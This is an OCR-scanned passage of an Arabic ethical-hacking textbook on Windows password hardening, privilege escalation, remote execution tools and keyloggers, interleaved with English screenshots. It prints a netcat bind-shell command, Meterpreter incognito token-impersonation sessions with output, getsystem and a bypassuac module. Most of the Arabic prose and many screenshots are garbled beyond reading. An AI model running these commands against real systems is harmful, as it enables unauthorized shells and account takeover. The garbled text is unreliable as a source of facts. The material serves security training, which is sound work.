In the list of available policies, double-click Network security: Do not store LAN Manager Hash 
value on next password change 
- Click Enabled ^ Ok 



File Action, Vi< 



Local Security Policy 



Help 



fflilXiilll 



Security Settings 
0 Pj^ Account Policies 
j4 Pj^ Local Policies 
I> Audit Policy 
j> i~^ User Rights Assignment 
Security Options 
l> Q Windows Firewall with Advanced Seci 
l3 Network List Manager Policies 
lZI Public Key Policies 
O Q Software Restriction Policies 
[> lZI Application Control Policies 
> IP Security Policies on Local Compute 
[> iZZl Advanced Audit Policy Configuration 



Network security: Do not store LAN Manager hash value on ... Enabled 



Policy 

Network 
iljjii] Network 

1^] Network 
1^ Network 
13 Network 
liu] Network 
leis] Network 
Network 
Network 
^| Network 
1^3 Network 
IS^I Network 



security: Allow PKU2U authentication requests to t... 
security: Configure encryption types allowed for Ke.. 



Security Setting 
Not Defined 
Not Defined 



security: Force logoff when logon hours expire 
security: LAN Manager authentication level 
security: LDAP client signing requirements 
security: Minimum session security for NTLM SSP ... 
security: Minimum session security for NTLM SSP ... 
security: Restrict NTLM: Add remote server excepti... 
security: Restrict NTLM: Add server exceptions in t... 
security: Restrict NTLM: Audit Incoming NTLM Tra... 
security: Restrict NTLM: Audit NTLM authenticate... 
security: Restrict NTLM: Incoming NTLM traffic 



Disabled 
Not Defined 
Negotiate signing 
Require 12S-bit encrypti.. 
Require 12S-bit encrypti.. 
Not Defined 
Not Defined 
Not Defined 
Not Defined 
Not Defined 



■8j 7j lS^-*-*^ 4 rthil Lixialjiial ^jja jll uj^ j Enable j uj^ t . 1 *>J J»^51j 

(Implement the NoLMHash Policy by Editing the Registry) cJ?^ JjjL j& NoLMHash <^A^ iiiu -2 

registry ^ ^tSLJI cjkj^ c*Uij 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 

NoLMHash ^^4j f ^ 

Registry Editor - n H^H 



File Edit View Favorites Help 



> IB 


DeviceOve 


>--ifi 


DevQuery 




Diagnostic 


j k£ 


EarlyLaunc 


>--ifi 


Els 


▻ --tfi 


Errata 


>--ifi 


FastCache 


! M 


Fi I eSy stem 


:--IB 


Fi I eSy stem 


> -ufi 


GraphicsDr 


! JB 


GroupOrde 


>--i£ 


HAL 


I i£ 


hivelist 


> -i£ 


IDConfigDI 


! h 


IPMI 


> -i£ 


Keyboard L 




Keyboard L 


> ■■ Jti 


Lsa 




LsaExtensic 


: ... jy 


Lsa Informs 


> n 


MediaCate 



Name 


Type 


Data 


(Default] 


REG. 


JSZ 


(value not set] 


auditbasedirect... 


REG. 


.DWORD 


0x00000000 [0] 


a u d itb a seo bj ects 


REG. 


.DWORD 


0x00000000 (0] 


^^Authentication ... 


REG. 


_MULTI_SZ 


m svl 0 


JE^] Bounds 


REG. 


.BINARY 


00 30 00 00 00 20 00 00 


crashonauditfail 


REG. 


.DWORD 


0x00000000 (0] 


_mo] disabledomainc... 


REG. 


.DWORD 


0x00000000 (0] 


_m"J everyoneinclude... 


REG. 


.DWORD 


0x00000000 (0] 


^lo] fore eg u est 


REG. 


.DWORD 


0x00000000 (0] 


X0\ f u 1 1 p ri vi I eg ea u d i . . . 


REG. 


.BINARY 


00 


^LimitBlankPass... 


REG. 


.DWORD 


0x00000001 [1] 


J^jLsaPid 


REG. 


.DWORD 


0x00000240 (576] 




REG. 


.DWORD 


0x00000001 (1] 


***\ Notification Pac... 


REG. 


_MULTI_SZ 


scecli 


Jjt^ProductType 


REG. 


.DWORD 


0x00000004 (4] 


restri eta n o ny m o . . . 


REG. 


.DWORD 


0x00000000 (0] 


.5o] restri eta n o ny m o . . . 


REG. 


.DWORD 


0x00000001 [1] 


410] SamConnected... 


REG. 


.DWORD 


0x00000001 (1] 


J«o]SecureBoot 


REG. 


.DWORD 


0x00000001 [1] 


Security Packages 


REG. 


_MULTI_SZ 





C o m p uterVH KEY_LO C AL_M AC H I N E\SYSTEM\C u rrentC o ntro I Set\C o ntro l\Lsa 
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(Use a Password that is at Least 15 Characters Long) 15 i> j& JSVl Jc jjj* CjUK ^^ki^j -3 
^iLlaaj jla ^jjj L* La! l_ fl^p. 15 lS^I uj^ cs-^J L1VT HASH J JJ^>^ ( ** & ^ jjLuHj ^ j£i jjAbjll ial jj jl i— ^ 

_iaia l_aj^ 14 ^*juj jl ILLoj LIS La£ LM hush J 

low to Defend Against Password Cracking jjj^t cjU*a ±± jilii < 

l^L^I <jLc. ^j^j3 f^^j g\U i ™ j& 'Password Hacking ^4 j '(Password Cracking) 

j^-^ J& JJJ-* J J > ^ AjjojLojVI AijjJall . JJJ-* (J^ ^j'j^' t^UaJ tA^jJal] 4j £JJ^a» jjxll ^l >lkluj VI 

< " & jj <Jj^-^ jj;^^ lLu^ jj jjj>i^3l 4_ixijj! jk ^I^IujL tilli ^jj . IjIj^jj IjIj* a afc^ * < ** ^ jj AJjL^xi <_£j^.l Aijjla . JJJ - ^ 

jJal ^ a t . n Vl j-a .<! > n j ^AjL^aJ jl j^-oJ j^ J t4 qjT > ^> JjuJI lij .^^L ^cJ jxi Jc (Jj^aj^J (^^i^ J L_flj^.VI j-a 4 alL^ ^ 

I^Vl^ ^aA j JJJ* *LaK jj > u£j AjJa ciLuoij jC ^laJl Jc til^cLoaJ ^^jJl Jjjlall (J^-J ^1L& 4 jjjxJl *Lol£ JJ > m£j 

(Jj-o liL 4_j^aljkJl CjLi jJjlaJI Jl (J jj^a jll J^l nil ^xujjJ )1a j) dli^ 4(J^^ uj £xi 

ft^lc j > gajkj ^^jll CjLi jIslaIIj CjLLjII £^^J ^ > J -0 

t lLLjj 4^^jjoia3! j^ ^ AjLjILq ^.Ij jI t jjjaII jjjju ^.LjI jjj>Ji ^uJS (jjoij ^ i^jLujj V -2 

# jjjxJI cjLa^a ^jjj j •^j^j ^^-Sc o^cLoiaI] (jLiVl (J^^ jj£ aj -3 

jxilill l^Jc JJ^xJl JJJ - ^^ ( & ^ » I^JLujJ V -4 

.^jVL^jI L_flJXjJa3l jJfljoijll dili CIjV j^ JJ J^>J^ J ^-^al jJl (J^»i^ J^ JJ ^A^LujJ V -5 

30 l£ «cjji tSlli ^ (password change policy)jj>^^ '6 

(JjjJajxJJ jj jJJ^ll CjliLo JiL<i (j^Lil l^JJ j^J ^aJ ^^jll JjuJI Cjl ^jV (JjxijJa-a JJC. jl^-o ^ JJ^>^^ ^ ^ U^3^ ( ♦ "7 
^ISjVlj Sjjxj^IIj 6jJJ^3l L_flj^.Vl ^tJ jxi USjj lija. Jjujc ^^jjI 4_ijLiJ ^I^JjujL JjuJI t & jjy^kj L-Jxj gall ^j>i J*^- -9 

_cjL^gil L^c j^a^. LiK ; jjjaII ^jisu ^l^jl LiK .t^-iiA^j l-jxj aj "LjS ( J <^ . jj-^^j 
jli SjSlill ^ jjoJI CjUK (jjj^j lij .o-^j^^ ^Lill jl ftjStil! jj><^ djUK ojj^j ^ jSj V Cjlinlajl) ^ ^L-10 

-( _3Jjiaj3l ^I^JjojI ^ ^3 jl^. M*i <aJ ^1x^.1^13 <Jjou3L AjLil lS^-^^ L>^ JJ^>^^ Aijx-<i ^j^-aJj ,l^jajjaj (j^-ftJ ( - ^ ^ 

JlkjV 11a ^^iklujj djj^ .ojjiJjj JjS jjj-o ^-aK ^ (prefix or suffix) j'^j' J (salt) j^- ^1,^ unl -1 1 
u^U-^ jjc- 1> aAS t^l jaVl ( fllik^ salt u' ^ .memorization j pre-computation 

bit salt ~ laJLujj o^lc jjj^jjjj a Aiaji . jjj>Jl <-<J£ <J£ j>i s jjjobQ <jkjaij (Jjl^JI 
cjLLaiaJ jjja31 djU jlxxi jj j^i ^jj .SAM ^jIjj s^cli ^LL^ j jji^ ajjS jjja ^ SYSKEY j^-^-12 
Jj J jj^a jll SAM s^clS ^I^jjojI jjjxJ! jj.u£j ^LjjU J^JI .SAM ^^U? ^^clS ^ jj^>ikl^l 
ajL^JI jajj SYSKEY .Sjj^l ^ SYSKEY 'CjVUJ! Jla L-iba3 Jil .jj^^ikl^l CjLL^J cjUK 
jjLujjH cjLjjj ^I^VimL jjjaJI <>iK jj > a£j SA1VI L - J ^^ J J <j j^xJI ^1 6 ^^jjoiaII l-jL <>iK CjLi jl»^13 

.SjLuLq jjc. CjLi SjLuIaSI JJ^)-^^ CljLi jlst-<i Jjuj£ CjI^I j^.! iljkjl 4-Jjt > ^-i JJ^I '"'J^ .AjjUI 

lil L fljll jl jJ^. ^jojI jl Jilall jl 6^!)Lia3I ^JjL (JIa tiL <j^aLaJl JjuJI CjLiKj A-L> uJl CjLi jIslaII l^jl ^ I^JLujJ V -13 

.CjIaKI! tSllS Jjo£ cilia ^JJjS f& jjill jjjLII 1^ J^-uill t£>^A JjuoII dil dl£ (JiLa a, W'utn 

j-<i ^cjll Jc . jjyi^kiauill CjLLu^. Jc (Brute Force attack) ^-^LJI s jail CjL^a jc c L^ll ^Lkll Cj^^joj <jaljxi-i4 

jL^i J£ £A j! t - 1J^ _ L_JJ jl! ^a^ljk (J^JOJ AjL-aj J^jk jxi > >1J IAAj^J (j^-<iJ (j^l J tl^iUj] L-JJU ^lj 6^-^.>.>lLJ| 6 jfill CjLl^A jl 

-t *L ^UJI c_jjj3I ^Lk Cj^U^ ^ HTTP 401 status code ^ 4<l^la Jj^j 
jajj 11a .password throttling cr^j 3 ^ > ^ jjj^II 4_*1£ cj! n^fl t j^ 1^ jjj^ ^ jxjII l^Lu^JI J^-15 

. jj-A^jll j ^jjujlxll 6 jill CjLiaA AjJa AjLa^JI 
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Implement and Enforce A Strong Security Policy 4^1*1 a^J^m o^jSj iA2 

m (j*i\ 4_uiLiui AjflJJ j (JIaJI A^JjuJI (j-al 6^Uj j^J J jVl 6 jjn^ll .4£jjuJI ^ dlLa jlx-<Jl j^l t ^ a (j-a ^1 (j-a (jlaljjcl ^I^JjojI ^laL^G 

^j^LJ a£jjoJI j j^a. ^fl ^jjSjLt.a<Jl ^1 tiL ^aL^JI (j^ila ^<J1 ^-ia^J ia^a ^jjjJ <J j^jj jjoj I^jV AjUlU ^H*' AjojLluJ ^jLuJI ^jqV^l 

_A-lA3t <J1 4_iL<iVI (J jj^aVl A_jL<^. La AjIIaj Ljajl jfLj i o j 



Pel ninnofi t Account Lockout 


- Employee Privilege Abase 


E mpk>yee NMM 




Employee 10 Jjt 




Employee Address 




Empkivee SSN Q 




Employee Designation 


DcfMftrrwnt |0f 




Meruger Namt 






fermiriitfcn 
Si Effective Date 




Notice PerkxJ 




Comlrajadon 


Y X 


Stvtrvct ^e 


Y X 


^"^^^ ^^^^ 
T*rm4o*doo Rtawm 


■ Opening unwiicrted e nuil 

■ S4tidmp, \pMn 

■ Port vjnr*if>R 

• Attempted unauthorised accevv 

■ Swfing porn 

■ Possesion of hacking tools 


■ ftefuval to abide by security policy 

■ Senditig unsoljcited r mni 

■ AHowmg kids lo me company computer 

■ DruMing virus sc jriru-f 

■ Running P7P file stufling 

■ Un juthorired (We/web serving 

■ Anrvoyinfttti-eVyslerTi Arirmn 
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Escalating Privileges 5.4 



jj^JI CjLaK ^AaJlujj 4<i^.j-<Jl .<jj^ajall ^Uaj ^ ajjIjII <L^.^<JI (Escalating privileges) ^ jb^*^ ^3* > ^ 



Privilege Escalation 

l_j jjc S^liluiVI cJ^-^- ^ ^Jaiij^Jl Cljlknialillj CjUUJIj CjI^jjoJI <J jll L-b uj^j g all tdil jLiLdVI - ^ ^ 

^.I^aII <jl£ b] ( JUaII cJ^f^ (^c- . (Admin account) J jj jaj - < ^^ <-jLju^ Ji* ^Jc-i cjI jUlol ^.v^nm l-jLo^. m* > alll 
'yi.^lnL ^U^l Cj! jUlo! CjI jUul \it > n\\ ERunAs2X.exe sbi <u£«j 4 WZK SPl^ <J\ Jj^jJI 
jj^j <u£*j tdjULJI cJi^j t^Jj^udj CjUjkJI a! jjuj ^.1^11 jSaj cjljliLiVI "nc.exe -I -p 50000 -d -e cmd.exe 

. (Horizontal privilege escalation)^^ £i\JJlLa\ ^ > (vertical privilege escalation) gr^'j ^IjLu^l ^ > ^ .(jJ^ 
L_fljl!aj3lj ^jl^JI J^x^jll <j ^ j^JI jj^ ^ ^" ,, i^ t Jjl^j : (Horizontal yrivilese escalation)<J& CjIJUIaI jj^gj 



^^kl^ll t^jUajllj j J! Jj^jll <j ^ j^ixi jjiJI ^ ^IjlaI I JjUj ; (vertical yrivilese escalationSi^j CjI Jbl^l Jj» 

.(Administrative functions) cjljlnJ ^ 



Attacker 




I can access the network using Jo tin's user 
account but I need "Admin" privileges? 




User 



Privilege Escalation Tool: Active@ Password Changer 

http://www.password-changer.com : j^-a^ll 
^^klai^ll jjj* CjIaK j aII J jjjoiaII ^bjloal jl *Lij] Sjlcb pi jjoj jjuJ! o^UiuiV ftbl ^ Active@Password Changer 
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Features 

Recovers passwords from 
multiple partitions and 
hard disk drives 

Detects and displays all 
Microsoft Security 
Databases (SAM) 

Dh plays full account 
information for any local 
user 





Active® PafiEWC-r-d Changer; User List. 



*tv¥ Cr Q r SZE ?3GB. File Systerr: NTF5 




1 "Lpa. 


Uht Ham it 


Deficnptnn 






^dnristratnr 


Built-in KCGuntforadmrictE 




t £ firnnriTq 








1 a,U«Q^I 


Am 


I ■ 1 - - » — - account -nsrguart =■-■- 




1 m. • 'JW'KID 




P+.-itt EEl I Server a^tawDBa 





(J jj^a j3! Asu 6 La j-oC- .(jl^Vl tilil jLiLdl li* - aJJ ^ jSJ ^j) ^-xJl ;4_i^jJa3l jj jiis&l] jtg-^. (J Jj^a j3l (j-a du£ aJ A3 QJ^J (ji A*-J 
L-jLua^ j& Ua^A (jj^J 6<il3i j jJJ^ll ^Vim^ <jJaikl<i CjI jtiLal Aj^I ^Aaajau> ( t it > <J jj^ jll tilLaJ ciljli jl^-aJi ^1 

. (impersonation tokens) J^VI jj* j fl^^iuL ^ jL\ ^lui* JUl>l ^J*3j jju> ^ y±l\ ^ 

CjI jLiLdVlj 6^^jjoia13 cjIc ja^JIj ^Ld^jjauJ! ^AaJ ( - <J j^-^ l},^ ' ^ a uilaJ 4_ii<»VI CjU» jIslxJI ^^Ic j^^ (Tokens) jj-*^ 
jj^j _aSj1 > ^i^I a y >i\^ ^3?^ (access token)(J j^^j ^ Oj-^j <^ a ikii* ^ J j^ > ^ ^jc. a ikiL 

' (system accouni)^^ c_jLai^ . j±\ ^Vi»^ JU^jl (jjjia lij^ cj! jliLil \i* > ^ U3 ^^£5 (impersonation tokens) J^>V! 

<J jj^ jll (Jj^- £^J^ L_kstjJa3l li^ ^Aa^LujJ 

t> .Meterpreter ^ J j^^^ c> (impersonation tokens) J^VI J>« j cJLS£U jVI l^j 

.ILLaj Uij^j U£ Meterpreter J j > ^N J^-l c> ^ \u>\*\ \ 4^.1^3 Metasploit ^l^i^l 

:Meterpreter c> j ^VIS armitage ^^i^j ^ j^ ^Vl J^-^ 



Armitage 



Armitage View Hosts Attacks Workspa 

*- iM auxiliary 

► dS exploit 
" & payload 

► 1m post 




192 . 168 ; 1 . 105 
NT AUTHORITY\SYSTEM @ TEBA- 293DD9GF08 



[ Console X J Hail Mary X J Meterpreter 1 >T|_ 




https://www.facebook.com/tibea2004 



396 



use incognito a^UL JjjL incognito ^ J^k <> lD^VI <^ Meterpreter i> 
ic^VlS incognito c£*t cAA<^y\ a^jJ help j^VI 4^Lk> pjb ^ Meterpreter ii£5 



meterpreter > use incognito 

Loading extension incognito. . .success. 

meterpreter > help 



incognito 4-* * 1 ^ ^ ^ CjI^LoiaII \ La^j La (j^j CjI^cLoixJI ^jaslSI ^^^U ^juj 

help <^LL ^ 



Incognito Commands 



Command Description 

add group user Attempt to add a user to a global group with all tokens 

addlocalgroupuser Attempt to add a user to a local group with all tokens 

adduser Attempt to add a user with all tokens 

impersonate_token Impersonate specified token 

listtokens List tokens available under current user context 

snarfhashes Snarf challenge/response hashes for every token 



^Yl^-u) ^ list_tokens j-Vl ij4±j J^U <> t*Ui J*i> ^ j .s j^Vl <j jVI ^ ^U^l 



meterpreter > listtokens -u 

Delegation Tokens Available 

NT AUTHORITY\LOCAL SERVICE 
HT AUTHORITY\NETWORK SERVICE 
NT AUIHORITY\SYSTEM 
TEBA- 293DD90F08\ JANA 

Impersonation Tokens Available 

NT AUIHORITY\ ANONYMOUS LOGON 



^jujI] impersonate token ^I^jLuAj aJUII ^U^l ^Uj J!>tk ^ t^lli j & JLaJijVl ^ Jj.-kJulj ^ jij ^aJUII s jlaaJl 

impersonatejoken TEBA-293DD90F08WJANA 



meterpreter > impersonate_token TEBA- 2Q3DDQ0F08\\ JANA 
[+] Delegation token available 

[+] Successfully impersonated user TEBA-293DD90F08\JANA 
meterpreter > I 



. J^j gJUJ! ^Ikill ^^kludj jVI L^jl lij 

^jjL Meterpreter c> j system ^ v^^ l JU^jl (j&j^ cjU^X^I! jl ^ j^J <ajjia ^jj LjsjI 

_4jt-o — h jLi^Jt ^\ ; AjljLik ^-i^ <3jj^ Liajl getsystem ,>*VI <cLla 



JjiiJjj ^ o^ii jl bypassuac d^*-^ 6 C5^^^ cjI jl^j^aVI jl 7 jj^j JW> J j^^ J 
iaj|^)3l djUi jlx-<J! ^3^(UAC) ^^jLluaII l-jL ^ dia jjoajj^jUi jjLaaj <>— .getsystem j-**^ 

http://windows.microsQftXQm/en-us/windows7/products/^^ ic^^' 

:Meterpreter ^ yr^ ^ ^^j^^ ^I^IujIj I^a J^-*^ ^jjj 

run post/windows/escalate/bypassuac 
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J dj| j^I 
L-jL 



Other Privilege Escalation Tools 
jjj* djUK j Windows administrator J ^islVI jl <*o£*i <3Jljl j <jUU t*U Cj\j\JL^\ 

t ** & Aij^stxi jjisJl jl 4_Lail<Jl JjJ-<Jl (jjJ*J S^tcl (jJ^la (jc jj jj;^^ <J jj^ jll <U > nj <J jj^^J! aJ ;CjIj^VI 

Offline NT Password & Registry Editor available at http : //po go stick, net 
Windows Password Reset Kit available at http://www.reset-windows-password.net 
Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com 
Elcomsoft System Recovery available at http://www.elcomsoft.com 
Trinity Rescue Kit available at http : / / trinityhome . org 
Windows Password Recovery Bootdisk available at http://www.rixler.com 
PasswordLastic available at http://www.passwordlastic.com 
Stellar Phoenix Password Recovery available at http://www.stellarinfo.com 
Windows Password Recovery Personal available at http://www.windows-passwordrecovery.com 
Windows Administrator Password Reset available at http : / / www . sy stools group .com 

(How to Defend Against Privilege Escalation) cj) jLIaV) ±*-*£ ^ ±± jilii 

AjjS^S CjI jLiLdl ^^>^<i jl 4j£*oA lS^I CjI jLiLal ^£J^ qAa laJLudAll (jl ^£U3l j& CjI jLiLdVI N J» - gaJ ^ AjJa S^LjaxJl ^j^iall <JjJaal 

(JJ^>1 g all (j£-<uJl 4il .CjI jLiLdVI - ^'y ^■-■(u.hj 4_^x»^)Jl ^1 j£l L_J jjisJl C-pasu t^jLi^Vl (j* ,L?-*^ <J^-^ ^Uaill ~\ iklLoiV 

# <J JJjoi-g (j-a ^.5^1 j^f^l CS"^ J J> (£ ^ .Ajjl^j JjiC. L-jL ^I^Vlmlj A^JjuJl ^1 <J jj^ jll 

•^j*^| ^IxJl jliLdVI ^ > ^il AjJa a^Lja^ll j^l^ill <J-gjuiJ 

.(Restrict the interactive logon privileges) Jj^ll £jI jl^J 
.(Run users and applications on the least privileges) cjI jli^VI JaVl ^ c^llnkill Jj^jj ^ Wmi^ t J*^ 
. (Implement multi-factor authentication and authorization) lW ijiii 
.(Run services as unprivileged accounts) J^-^JI ^I^j £jI jLjl^l c> djU^kJI J;!^ 

(Use encryption technique to protect sensitive data) ^l^JI cjUUJI ajU^J jjLSjII ^l^kl^l 

Implement a privilege separation methodology to limit the scope of programming errors and bugs 
(Reduce the amount of code that runs with particular privilege)^^ U^jili J&\ ^Ij^VI 

(Perform debugging using bounds checkers and stress tests) > ^ ^'j^j 

Test operating system and application coding errors and bugs thoroughly 

(Patch the systems regularly) ^U^U ^J^l ^ > ^ 
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Executing Applications 5.5 



^iiii <J (Jj^Lg ^jjuj <^1j ,^c3l t(J jll <! j^juj Jali^ll backdoor L "\if"j ' jj^^l Jalisltj t < ** >1 j^^j ^^Uaill 

Executing Applications 

axj ^jj Executing Applications .^Uiill "^^idl" ^5-^ U j .<k ^<JI £>i& 4ln^JI CjlLfkill ^ <jiasu (j^l^l ^JL 
<j 4_^UJ! 4lniJI ^1 jJI o^ju iiiii J jL^j ^ig-J! . (administrative privileges)^u^j ^-A^^a ^1^1 c_La£&l 

;^Uai3l Jjl j-g 4_j ^j' >■* * J^*-^ <J '^4^ jj^iJl (j^^ jl Exploit C5^j C£^JH (,5-^ <*-^-* jl*-<<Jl £-<^J A-i^jJall jlg-^. Jsu 

a\u\\\ jJI 6 J j^ 3 ji^ ^-W 3 iaU^il backdoor ^u/" <screenshot ^sul\ j ^ jjjJI djUK j 

Backdoors 

jl^a jl Exploit J! Cs?^j3 CjUjkJI 4 (disrupt operation)4J*x]| jl deny J Z*** ™ c^JLiki ^ 6J Lc 

Crackers - 
Keyloggers - 

£j3U* <J a^ ja J£ cJ^SI jl£ o^^^ ^ .(software) (i^j J (hardware) uj^ ^ 

, jj jji^ll 
Spyware - 

. jj^l^SI djj^j jj*^ ^ l^ILa jjj (Capture screenshot) c> ^ (Spy software) ou^l ^1 jj 

> >~i\\ jj jjj^^l j^-^- <J j^-juj ^^-Sc iali^J] Backdoors c_ ujjjj ^jIj ^.1^31 ^jli tA-i^jjall jj jjj^ti 



xecuting Applications: RemoteExec 



http://www.isdecisions.com : j^-a^ll 



^nW\ .4 ^1 > Ti\ l ^LaJl djUj^jajVI/^l jJI ^ cf 0 ^ "uj^j ^ RemoteExec 

<j^aLaJI JJ^>^ ^ ^ clA^ Cy* ^Jc-Ijui^ ^ . jjAljjll ^^^-Sc Jjsll ^5^* 'l^_kjudj Ljajlj lla allj 

D^lcl Uiajl (j^J 6<il3i AiLjaVU JJ^*^ LS^-^^ CjULoi^J! Ail^ (JjlaxJ ;Asu ^jc <Jjjjoia3! ^^JjoixJU 

c> <^ Power offj 'wake up «-^%] « 

.r'nmli 4_iLixj ^aL^Jl Wizard cJ^-^- cJJJ^^ C-ujjIj ^ jij 



;aJU3I ijiiLill ls^jj RemoteExec cij^ ji^l c> jJt J^-^ -2 
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Tools Window 




RemoteExec 



RemoteExec 



L^ Remote jobs 
^ Reporter 
Scheduler 
Options 



| Description 

Allows you to configure,, manage and execute remote jobs. 
Allows you to display reports on remote executions. 

Allows you to schedule remote executions and generate automatically r 
Configure RemoteExec options. 




Remote <ija jfcM t> ^ <4j (Executing file) 3 .n > ^ l l ^U > W ^ cjj^ ^1 cjULJI -3 

;aJU3I <j^LUI cs^jj jobs 



Remote Exec 



File Tools Window Help 



RemoteExec 

^ Reporter 
. Scheduler 
*"~.J£* Options 



Remote jobs 

RemoteExec/Remote jobs 



L^£L New remote job 
LZ' 1 My Remote Jobs 
1^. My Remote Actions 
My Target Computers 



Descriptioi 



Allows you to configure and execute a new remote job. 
Your favorite remote jobs. 
Your favorite remote actions. 
Your favorite target computer lists. 



\JN& new remote job J^jj ^tac-l New remote job <j> £>0^ J^h -4 



RemoteExec 



Tools Window Help 



l = l " RemoteExec 

S l«d Remote jobs 

| ^-^D 

j £ File execution 

Update installation 
j $ | MSI installation 

System action 
f"T| File Operation 
vj 1 Local account maintena. . 
{=] Popup 
If^L Multiple actions 
j-T^-l My Remote Jobs 
!• I^j, My Remote Actions 
; - My Target Computers 

..^ Reporter 
-• Scheduler 
f^> Options 



New remote job 

Re -o;eExs: ~:.e— _ :e ;cos ' e/ - e— ore ;co 



I ^ File execution 

Update installation 
| % | MSI installation 

System action 
PF| File Operation 

Local account maintenance 
1===! Popup 

Multiple actions 



Description 



Execute a file remotely. 

Install a Microsoft update remotely. 

Install a Y^/indows Installer package remotely. 

Reboot/Shu ;co\' " = <e up a computer remotely. 

Copy files or folders to remote computers. 

Change the local administrator password and/or disable all other local a.. 
Display a message to the user logged on the remote computer. 
Execute several actions in one pass. 
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Qp. Jaxj ^Ij CjI^^a^I q* ^jaxJI ajjj jSaj New Remote job ^I^VI * -5 
l^^JI J&UJI cjliukill ^ ^1 Jj«-xijj ^ill j File execution 3^1511 ^ J!^lk jU^j <— i JliaJI J^jui -6 
\<A\a1\ 3-^Ui3l ^1 j ^ ja> File execution £ j-O^ j*^' j ^ 



File Tools Window Help 




q..^^ RemoteExec 
© -j^l Remote jobs 

- -E^, New remote job 

QEZ 

Update installation 
fjPj MSI installation 
System action 
Qj File Operation 

. Local account maintena. . 
{=] Popup 
•IQ, Multiple actions 
My Remote Jobs 
My Remote Actions 
My Target Computers 
© ^ Reporter 
. Scheduler 
. JP Options 



File execution 

RemoteExec/Remote jobs/New remote job/F e execution 



File 

Directory 
Arguments) 



Administrative 



"^1 



S Wait exit 

Console 
0 Auto 



Reboot 



Launch 
|~& Launch in a new tab 
u]§ Schedule 

L^L Save in My Remote Jobs 
1^. Save in My Remote Actions 

Save in My Target Computers 



4^jU3I ^ . A-iauJal l jl^ ^jjj ^ill exe File ^ File execution s-> ^aUJI 4_ajU3I ^ -7 

.auto Interactive Context j^^l c> 

:c5 jVI£ ^ ci^JI ^1 l_lu^ Jk. jU^j filter m l^ 1 ^ 11 -8 



r^H OS version | = I^H| [ 

r^l OS level 



-m 



S s 



ervice 



pack | = |<Mto|l | Serv ice pack Z l-a-M 



| = I Workstation QCPUtype 

F^l IE version | = |&.Q SP1 I I Language 



3 



I Registry value 

[Exists 



Don't execute again on a computer where the action was already executed 



y&\ J^U. tillij ( jjil-iM I J^-*^ ^j^j ^^Jl Target computers m o^UJI * jaJI ^ -9 

.ei^JI JU^jj Name 





— ^ Ma me 








X 












Name : 


DZ 






1 




| Computer 














OK 


Cancel 



I. 



Computers 



| Remove 



gear att 



.^j-qjVI L_uLaJI (^ic 4_Ajli3! ^ *^ ja. Lunch c3j* q."^*^ <Jj*j^ ^ jij djbl^cVI ^-i^ a*j <jVI -10 
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Executing Applications: DameWare NT Utilities 

http://www.dameware.com 
sa&Lula ,Asu ^jc a1 A\ jj jjj^ll j 6 ^ *M jj jjj^ll Sj^-^i j ^a! j^JI *O^V ^ ^-alhj Dame Ware NT ^^^>^ 

(jp, <£l^j\\ jl^J> ^alAiJLuilj Jig-ill ^A^JjuiaII <j£Luui (Ja. Jc SjAall 4ja3 Ljajl . jjAjjjll Sjbjj Asu jc JJ jJJ^I Sjg-^-l kj^j rtJ JA& 

t . ii< ^Ljoj (capture screenshot) <*-iUaa3 a^Ij tAsu jc <1 ^1 jj jjj^I Sj£j>lj ^*aI j^JI J^*^ d^IcI (j£-gj <ul£ .a*j 

Sjblj 4 Asu jc jj jJJ^SI Sj^j^I Jc CjliLJ! tilli^j ^cjoij A i£ aJ 4<c.jjaiJ Jig-ill ^A^JjuiaII t . n£ /^l ^iajuj Jc <LA£]| SjIaJjuJl A j£ aJj 

^active directory Jj^jj 




ne NT Unlit ts 5errtCK hMN D 3GMR5I I LDE+! 



fe^* fe ^ ^-ge -bh Qfe oat 



Browser * **■ 

: ^ Mc Vfefi-ilwship 
- -fife MkmLnft SAiii-iHrwt Ni-twort 
_ Ifj '.VfflfcV- K;-|| |p 

! T y WIN ULM5SH*HLI P 
- /He ifcEtiticr s Ml 

■ r -0 i&DMIN-K 

! ► 9 mis: i ■- . 



^ l*Cw£*r _y r lr mi E r_ r 
Step S*ri'*t 



l>l 



- ^ %V h I>29MF.^ N _=E'M w 




slug rnd IDiqp 

"artt Me LJ—.ioe JiunEr*r lano 




L «N 



fc-cwiiOWTu 



4_ hirw Type 



I'iUl 



ill — i-iint Hirjry 

Ln ralSvEtnm CViUlnri 

Ld :all>T±=m L ?• \\ i n dews-'^p^efr rv^i nd: 

L k n I iym*wn L ■■ -iM i n Hrun ■ * r »it -n- \ evHUkU 

L i>: j I jj,. E±»m C-'.'WIn itoort'iJ^, ctkrr H'.ipa u4iu 
Ln laityrt-zn-. in Hz-r^: : p dtin-j ; r-^nnrC 

I , ^1 V i i «.Mi- I ■ yir-i • .. I -I 

!■. ..vlL-j -. i^i! i CriWm dewv'^ctan- ) ; i r-chutt 

NT AUTi-cifc. C:^inptows'-i: F ««rii.; ' r^an«5 

Ml -.IIIlj-iU * •■— ■- -■ ' 1 V 



C^P NUW 5CP._ a'^fJIJ S J ' . . ' ■ I 



Keyloggers 



tic o Jlsc j& .^cjliJI ^ jl j Liajl cj^j (keystroke logging) ^1^1 iai^Ja ct^j 'Keyloggers 

t^iljjJl <Jjuij-g jl ^jjjjoi^jll L-L^L^a SjIc SAjju Clal^ Jj ^jjILJI 4.^. jL t . u^j Lo Ail^ Jib ^jIj ( - Uiajl 6 (JP> ^jUc (jj^J 

J 0^*-^ (j^^ jl jl ^jj^ ^jujLj <Jj^j jll jPhishing s^j^il <JjLujj3! CjUg jIslaII ^ j^UI ^^Vl a^JI ^jjajsu 

jj j-q CjI ^1 jl tiljj j j j-q dal Jl* l^XftxlujJ CjLq jlst-d <3 Jjoj jA Ali. jll l^iAA j l^JC ^jisLxJl jAj^xJI j-o i—jjou] l^jl ^jj^. 

t . u\ < J JiLd <JjL^jj ^jialjC-V ^aA^JjaaJ Lo Ullc. ,IaAj^j ^aJJ L^J ^ajL jl! <lLjudj| jl j^>^ uJl ^jAJ V I— 6 J A\ JlLd jA ,^j^.l 
# ClljjjjVl Jc ^Jliial <J ^ j£j La j^ (JjaII j13 (j^J l— <JjL<Jl CA ^j; Jj (jjiila j-<Jl JJ jJJ^SI 4-Ljudj| Aj^jI <jcl L gall ^<Jlj 

